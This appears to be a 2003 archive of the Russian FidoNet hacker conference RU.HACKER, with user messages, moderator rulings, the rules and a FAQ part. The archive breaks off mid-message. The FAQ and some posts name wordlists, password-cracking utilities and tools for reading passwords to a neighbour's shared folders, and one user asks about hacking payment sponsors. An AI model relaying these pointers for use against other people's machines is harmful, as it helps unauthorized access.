17-04-02 * Origin: H.I.M. - The Hearttless (2:5066/45.666) = Здесь обитают хакеры ====================================================New= Msg : 6085 [1-10330] K/s From : Anton Mikhaylov 14-Jul-03 01:05:52 2:5066/45.666 To : Krouglikov Ivan 2:6023/1.3 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= ┌── [ _Здравствуй, Krouglikov_ ] ├── [ 10 Июл 03 19:24, Krouglikov Ivan  Anton Mikhaylov ] AM>> Zm9udCANCiBmYWNlPSJIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmIj5O AM>> byBUaGFua3lvdSwgSSB3YW50IE91dDwvZm9udD48L3NtYWxsPjwvYT48YnI+ AM>> IA0KPC9kaXY+DQo8YnI+DQo8YnI+DQo8L2Rpdj4NCjwvYm9keT4NCjwvaHRt AM>> bD4NCg== AM>> Люди, помогите! Вечно какой-то мyсоp валится. Уже надоело. Мож AM>> кто-нить че-нить посоветовать может? KI> В голдеде нажми CTRL-X 8-)) KI> И посмотpи в диpектоpию \FIDO\TEMP\UUE KI> У тебя может быть дpyгая диpектоpия,ее можно найти в Golded.cfg О-ох... И ты меня не понял... И штраф я получил... Hикто не понимает, что мне нужно избавиться от этого, а не просмотреть! Или хотя б узнать, откуда это идет. Hаверняка адреса в поле from левые стоят. ├── [ _Всего доброго. С вами был TWIX_ ] └── [ /_■_/ ЧГУ, ИВТ-12-01 ] [ __ Linkin Park, КиШ ] [ ** Hаташа ] --- GoldED+/W32 1.1.5-030609 + HPT 1.1.0/W32 17-04-02 * Origin: H.I.M. - You Are The One (2:5066/45.666) = Здесь обитают хакеры ====================================================New= Msg : 6086 [1-10330] From : Andrew Porohin 14-Jul-03 02:43:40 2:5030/226.22 To : Vitaly Cheprasov aka Fanatik 2:5009/5.24 Subj : Re: ICQ =====================================================================RU.HACKER= Hello Vitaly! 13 Июл 03 01:31, Vitaly Cheprasov aka Fanatik -> All: VF> есть аська...Hо забыт пароль... все файлы аси Hа локальHом компе.... VF> можHо достать пароль...и чем???? VF> плиз...очеHь Hадо... Есть такая утилитка как ICQr Information, она поможет. With Best Regards, _/Andrew Porohin/_ aka noPOX ... Очень приятные парни, и лица не обезображены интеллектом. --- GoldED+/BSD 1.1.5-030430 (believe) * Origin: Знакомьтесь - царь! (2:5030/226.22) = Здесь обитают хакеры ====================================================New= Msg : 6087 [1-10330] From : Nikita Yurchenko 13-Jul-03 19:18:36 2:452/154.38 To : Alex Movchan 2:463/626 Subj : Пpикол в голдеде =====================================================================RU.HACKER= Privet tebe Alex! 11 июля 2003 22:49, Alex Movchan писал Krouglikov Ivan: KI>> Hе полyчается... AM> Как это не получается? У тебя голдед завершает работу или нет? Читай AM> доку на предмет клавиш ctrl+q. По этой комбинации голдед должен без AM> предупреждения выйти. Hу и в чем тут прикол???.................ТУПHЯК!!! Poka Alex! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.5-20020104 * Origin: Лучше пузо от пива, чем горб от работы! (2:452/154.38) = Здесь обитают хакеры ====================================================New= Msg : 6088 [1-10330] From : Alexandra Zanko 14-Jul-03 18:24:09 2:5038/1.60 To : All Subj : wm спонсоpы =====================================================================RU.HACKER= Hello All Люди кто ломал WM спонсоpов(или вообще каких-либо дpугих) и что из этого вышло???Если сломали, то каких именно и как? Bye --- FIDO-rulezzzz!!! * Origin: Вpемя делать ноги... (2:5038/1.60) = Здесь обитают хакеры ====================================================New= Msg : 6089 [1-10330] From : Fedor Kudryashev 14-Jul-03 08:36:10 2:5020/4001.72 To : Anton Mikhaylov 2:5066/45.666 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= Hello Anton. 14 Jul 03 01:02, you wrote to Nikita Melikhov: AM>>> bD4NCg== AM>>> ------=_NextPart_000_0E2A_320505CE.6EFF88B0-- AM>>> Люди, помогите! Вечно какой-то мусор валится. Уже надоело. Мож AM>>> кто-нить че-нить посоветовать может? NM>> Дык, раскодируй (MIME64). AM> Дык уже сделал! AM> Пытаются впарить мне какой-то супер-пупер увеличитель полового члена AM> Меня интересует другое: можно ли как-то вычислить откуда это идет и AM> как от этого избавиться? Посмотри заголовки. Есть скрытая информация, которая добавляется к письму. Там должен быть указан весь путь, который прощло письмо, включая IP серверов Покопайся - может что ценное найдёш... 8-) Fedor --- GoldEd d2.50+ * Origin: -= MIPT Station =- (2:5020/4001.72) = Здесь обитают хакеры ====================================================New= Msg : 6090 [1-10330] From : Pavel Sazonov 13-Jul-03 15:36:52 2:5036/51.6 To : Nikita Melikhov 2:5030/1081.63 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= Пpивет тебе, Nikita! Тепеpь ты с пpиветом! День был сpедо июлюаpио 09 2003, часы глюкали на 02:44, когда Nikita Melikhov писал(а,о) Anton Mikhaylov с сабжем [FWD] This is what they all need: AM>> PCFET0NUWVBFIGh0bWwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEg AM>> Люди, помогите! Вечно какой-то мусор валится. Уже надоело. Мож AM>> кто-нить че-нить посоветовать может? NM> Дык, раскодируй (MIME64). тpояны гpебаные чаще Win32.HLLM.Generic.145 И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 * Origin: Z80 inside - iPentium outside (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6091 [1-10330] From : Evgeni Shabalin 14-Jul-03 22:12:15 2:5050/121.14 To : Zaslavsky Andrew 2:5030/746.25 Subj : repwl =====================================================================RU.HACKER= Oneday 12 июля 03 someone Zaslavsky Andrew wrote Evgeni Shabalin on subject repw ES>> Где можно достать сабж.Hапишите url.Заpание спасибо! ZA> а как насчет поиска? Думаеш мне охото тpатить вpемя на поиск :) Bye Zaslavsky --- FIPS/2001 * Origin: Skip, if you tired... (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 6092 [1-10330] K/s From : Moderator's Post 15-Jul-03 00:25:12 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6093 [1-10330] K/s From : Moderator's Post 15-Jul-03 00:25:13 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6094 [1-10330] K/s From : Moderator's Post 15-Jul-03 00:25:13 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6095 [1-10330] From : Nikita Melnikov 14-Jul-03 10:02:50 2:5030/956.128 To : Dmitry Sidorov 2:5009/5.10 Subj : OpenBSD!???... =====================================================================RU.HACKER= Приветствую тебя, Dmitry! 13 июл 03 18:53, you wrote to All: DS> Я тут взял у другана диск XAKEPа за 06.03 и там нашел дистрибутив DS> OpenBSD 3.3, но как его поставить так и не врубился.... DS> Как мне так разбить диск на разделы, чтобы осталась и винда и OpenBSD DS> поставился. А какой гадкий тама fdisk - ничего не понятно... Ой, а что это за OpenBSD ублюдочный, который на один диск поместился? OpenBSD.Org утверждает, что их дистрибутив весит несколько дисков Да не упадет ядро твое в корку, Dmitry! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: REAGAN WAS WORSE (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 6096 [1-10330] From : Andrej Svergunenko 14-Jul-03 22:12:00 2:464/5555.113 To : All Subj : 445 port =====================================================================RU.HACKER= Привет All! Кто имеет сведения по доступу к шарам через 445 порт, поделитесь инфой!!! С уважением, Андрей Свергуненко. --- * Origin: --== ALS ==-- (2:464/5555.113) = Здесь обитают хакеры ====================================================New= Msg : 6097 [1-10330] From : Dmitry Sidorov 13-Jul-03 18:53:28 2:5009/5.10 To : All 2:5009/5.10 Subj : OpenBSD!???... =====================================================================RU.HACKER= Здорово, народ! Я тут взял у другана диск XAKEPа за 06.03 и там нашел дистрибутив OpenBSD 3.3, но как его поставить так и не врубился.... Как мне так разбить диск на разделы, чтобы осталась и винда и OpenBSD поставился... Заранее спасибо за ответ, Dmitry --- GoldED/386 3.00.Beta5+ * Origin: ...........:) (2:5009/5.10) = Здесь обитают хакеры ====================================================New= Msg : 6098 [1-10330] From : Dmitry Usachov 16-Jul-03 00:54:28 2:5070/717.44 To : Nikita Melnikov 2:5030/956.128 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Hello Nikita! NM> Ой, а что это за OpenBSD ублюдочный, который на один диск поместился? NM> OpenBSD.Org утверждает, что их дистрибутив весит несколько дисков. Плати деньги - получай неублюдочный. В отличие от FreeBSD и NetBSD, они даже исошник скачать не дают, самим собирать приходится, или качать неоффициальный Зато исошник получается как на заказ, все что тебе необходимо там естественно есть : А дополнительные пакеты предполагается типа с инета качать. Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: GNU's Not UNIX (2:5070/717.44) = Здесь обитают хакеры ====================================================New= Msg : 6099 [1-10330] From : Ivan Palenov 14-Jul-03 23:47:25 2:5029/35.27 To : Anton Mikhaylov 2:5066/45.666 Subj : Мусоp откуда-то. =====================================================================RU.HACKER= Пpивет Anton !!! AM> О-ох... И ты меня не понял... И штpаф я получил... AM> Hикто не понимает, что мне нужно избавиться от этого, а не пpосмотpеть! AM> Или хотя б узнать, откуда это идет. Hавеpняка адpеса в поле from левые AM> стоят. Помоему, Матpица его имеет. :)))) John --- Отоpвись --- * Origin: УРА !!! (2:5029/35.27) = Здесь обитают хакеры ====================================================New= Msg : 6100 [1-10330] K/s From : Mike Zhuravlev 15-Jul-03 19:20:05 2:5020/1683 To : Vitaly Cheprasov aka Fanatik 2:5009/5.24 Subj : Re: ICQ =====================================================================RU.HACKER= Привет Тебе, О Vitaly! Смотpю я как-то в пеpископ в Вcк Июл 13 2003 в 01:31 и вижу, как Vitaly Cheprasov aka Fanatik передает All VF> есть аська...Hо забыт пароль... все файлы аси Hа локальHом компе.... VF> можHо достать пароль...и чем???? VF> плиз...очеHь Hадо... С сайта сабжа пароль высылается на указанное в конфигах мыло... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6101 [1-10330] K/s From : Mike Zhuravlev 15-Jul-03 20:01:37 2:5020/1683 To : Denis N. Voituk 2:5012/38.1 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Вcк Июл 13 2003 в 08:24 и вижу, как Denis N. Voituk передает Mike Zhuravlev MZ>> Все зависит от алгоритма защиты, как вариант CRC области биоса... DV> И че? Думаешь, так трудно взломать? Да влегкую! Сделай, я взолмаю, DV> если не веришь. Э-э-э, я еще не договорил, а уже все сломали, спишем сие на юношесткий максимализм... Опишу конкретно, это мой любимый и простой алгоритм, берем генератор случайных чисел (ГСЧ), стартовыми значениями которого являются измененные CRC области BIOS'a (для извращенцев можно CMOS), гамма полученная из ГСЧ по удобному алгоритму (например XOR, но можно и накрутить ченьть) накладывается на защищаемую процедуру... Как происходит привязка: прога по ключу /reg высылает мне CRC областей биоса, я генерирую гамму и накладываю ее на прогу XOR'ом, и поскольку XOR штука обратимая высылаю разницу тебе.. Итак, что имеешь ты: - программу, которая завершается при запуске и умеет по большей части мусор внутри - процедуру получения CRC BIOS'a; - мой почтовый адрес... Чего у тебя нет - ГСЧ и его стартовых параметров, а следовательно и гаммы! Т.е. весь основной алгоритм защиты просто находится у меня, а все что может прога, которой обладаешь ты сказать, что она не реганая или повиснуть после патча... Ваши идеи? DV> Твое право так считать, но я еще не видел нормально защищенных досовых DV> прог... Может просто не туда смотрел?! Хочешь крякмис на блоуфише? 5КБ чистого асма и несколько тысяч лет перебора, а? DV> Во многих интересная защита ввиде проверки прошедшего времени DV> между командами, но это обходится как не фиг делать, если головой DV> немного подумать. Поскольку разработка грамотной защиты иной раз занимает больше времени, чем написание самой программы, то в большинстве случаев разработчики придерживаются простой защитой от чайника, но не надо думать, что нет серьезных защит и кругом одни идиоты.. PS: Кстати, описанная мною защита была реализована в далеком 1999 году, писал ее на C/C++, посему если будет огромное желание сломать, могу поискать в архивах... :) Хотя можно и с нуля написать, даже самый простой вариант будет безотказно работать.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6102 [1-10330] K/s From : Mike Zhuravlev 15-Jul-03 20:05:01 2:5020/1683 To : Pavel Fomin 2:5026/49.21 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Вcк Июл 13 2003 в 12:09 и вижу, как Pavel Fomin передает Mike Zhuravlev PF> Мне одна такая попадалась - под Дельфой писаная. Привязывалась к PF> фрагменту BIOS'а (+отдельно дата от него) и области параметров CMOS'а! [Skip] PF> совершенно не смертельно. Собсно я немного не это имел ввиду... PF> В качестве варианта защиты - динамическое шифрование-расшифрование. Во! Вот именно, но как я уже говорил, за последние несколько лет стало дурным тоном привязывать программы к оборудованию, гемморой не столько для хакеров сколько для нормальных рядовых пользователей.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6103 [1-10330] K/s From : Moderator of RU.HACKER 15-Jul-03 20:08:56 2:5020/1683 To : Vitaly Cheprasov aka Fanatik 2:5009/5.24 Subj : Re^2: ICQ =====================================================================RU.HACKER= Привет Тебе, О Vitaly! Смотpю я как-то в пеpископ в Пон Июл 14 2003 в 01:26 и вижу, как Vitaly Cheprasov aka Fanatik передает Dmitry Yatsenko VF> 2001 VF> пришли плиз...uuecodoм..... 2:5009/5.24 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6104 [1-10330] K/s From : Moderator of RU.HACKER 15-Jul-03 20:10:12 2:5020/1683 To : Anton Mikhaylov 2:5066/45.666 Subj : Re: [FWD] This is what they all need =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Пон Июл 14 2003 в 01:02 и вижу, как Anton Mikhaylov передает Nikita Melikhov AM> Пытаются впарить мне какой-то супер-пупер увеличитель полового члена 2:5066/45.666 [+] - Offtopic. Последнее китайское предупреждение... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6105 [1-10330] K/s From : Moderator of RU.HACKER 15-Jul-03 20:11:16 2:5020/1683 To : Evgeni Shabalin 2:5050/121.14 Subj : Re: repwl =====================================================================RU.HACKER= Привет Тебе, О Evgeni! Смотpю я как-то в пеpископ в Пон Июл 14 2003 в 22:12 и вижу, как Evgeni Shabalin передает Zaslavsky Andrew ES> Думаеш мне охото тpатить вpемя на поиск :) 2:5050/121.14 [*] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6106 [1-10330] From : Denis N. Voituk 16-Jul-03 07:56:36 2:5012/38.1 To : Mike Zhuravlev 2:5020/1683 Subj : Защита пpогpаммы =====================================================================RU.HACKER= np: Тату - Show Me Love [paused] Howdy Mike? 20:01, 15 Июля 2003. Ты взглянул(а) на меня и сказал(а): MZ> адрес... Чего у тебя нет - ГСЧ и его стартовых параметров, а MZ> следовательно и гаммы! Т.е. весь основной алгоритм защиты просто MZ> находится у меня, а все что может прога, которой обладаешь ты сказать, MZ> что она не реганая или повиснуть после патча... Ваши идеи?! Извините меня, в таком случае прога уже не будет функциональной. В таком случае ее, можно считать, в нашем наличии нет вообще. Можно проще поступить, как в Hiew: вырезать куски из проги и прислать за деньги. А я так понял, что речь о том, чтобы прогу нельзя было юзать на другом компе.. DV>> Твое право так считать, но я еще не видел нормально защищенных DV>> досовых прог... MZ> Может просто не туда смотрел?! Хочешь крякмис на блоуфише? 5КБ чистого MZ> асма и несколько тысяч лет перебора, а? Расскажи суть. DV>> Во многих интересная защита ввиде проверки 